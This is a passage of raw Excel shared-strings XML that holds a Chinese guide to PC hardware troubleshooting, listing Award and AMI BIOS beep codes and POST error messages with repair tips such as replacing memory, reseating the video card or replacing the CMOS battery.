        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置错误，重新设置不正确选项。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明内存或主板出错，换一个内存条试试。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明显示器或显示卡存在错误。检查显卡和显示器插头等部位是否接触良好或用替换法确定显卡和显示器是否损坏。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明键盘控制器错误，应检查主板。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明主板</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Flash RAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>EPROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>错误或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>损坏，更换</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Flash RAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <t>　　重复短响：说明主板电源有问题。</t>
  </si>
  <si>
    <t>　　不间断的长声：说明系统检测到内存条有问题，重新安装内存条或更换新内存条重试。</t>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AMI BIOS</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明内存刷新失败。更换内存条。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明内存</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ECC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>较验错误。在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">CMOS </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中将内存</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ECC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校验的选项设为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Disabled</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或更换内存。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明系统基本内存检查失败。换内存。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明系统时钟出错。更换芯片或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电池。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出现错误。检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是否插好。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明键盘控制器错误。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应检查主板。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>7</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明系统实模式错误，不能切换到保护模式。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明显示内存错误。显示内存有问题，更换显卡试试。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯片检验和错误。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明内存错误。内存损坏，更换。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短：说明显示测试错误。显示器数据线没插好或显示卡没插牢。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <t>　　现象四：系统能启动，有视频，出现故障提示，这时可以根据提示来判断故障部位。下面就是一些常见的故障提示的判断：</t>
  </si>
  <si>
    <r>
      <t>　　（一）、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS Battery State Low</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　原因：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数丢失，有时可以启动，使用一段时间后死机，这种现象大多是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供电不足引起的。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　对于不同的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供电方式，采取不同的措施：</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接式电池：用电烙铁重新焊上一颗新电池即可；</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钮扣式电池：直接更换；</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯片式：更换此芯片，最好采用相同型号芯片替换。</t>
    </r>
  </si>
  <si>
    <t>　　如果更换电池后时间不长又出现同样现象的话，很可能是主板漏电，可检查主板上的二极管或电容是否损坏，也可以跳线使用外接电池，不过这些都需要有一定的硬件维修基础才能完成。　　</t>
  </si>
  <si>
    <r>
      <t>　　（二）、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS Checksum Failure</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验和读出错；提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS System Option Not Set</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统未设置；提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">CMOS Display Type Mismatch </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中显示类型的设置与实测不一致；提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS Memory Size Mismatch</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，主板上的主存储器与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中设置的不一样；提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">CMOS Time &amp; Date Not Set </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中的时间和日期没有设置。这些都需要对</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重新设置。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　（三）、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Keyboard Interface Error</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”后死机</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　原因：主板上键盘接口不能使用，拔下键盘，重新插入后又能正常启动系统，使用一段时间后键盘无反应，这种现象主要是多次拔插键盘引起主板键盘接口松动，拆下主板用电烙铁重新焊接好即可；也可能是带电拔插键盘，引起主板上一个保险电阻断了（在主板上标记为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Fn</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的东西），换上一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>欧姆／</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>0.5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>瓦的电阻即可</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　（四）、自检过程中断在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>xxxK Cache</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>处</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　这表示主板上</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cache</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>损坏，可以在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置中将“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>External Cache</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”项设为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Disable</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”故障即可排除。同理，在自检主板部件时出现中断，则可以认为该部件损坏，解决方法一般可以在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中将其屏蔽，如果不能屏蔽该部件最好更换主板</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（五）、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FDD Controller Failure</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不能与软盘驱动器交换信息；提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>HDD Controller Failure</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不能与硬盘驱动器交换信息。应检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FDD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
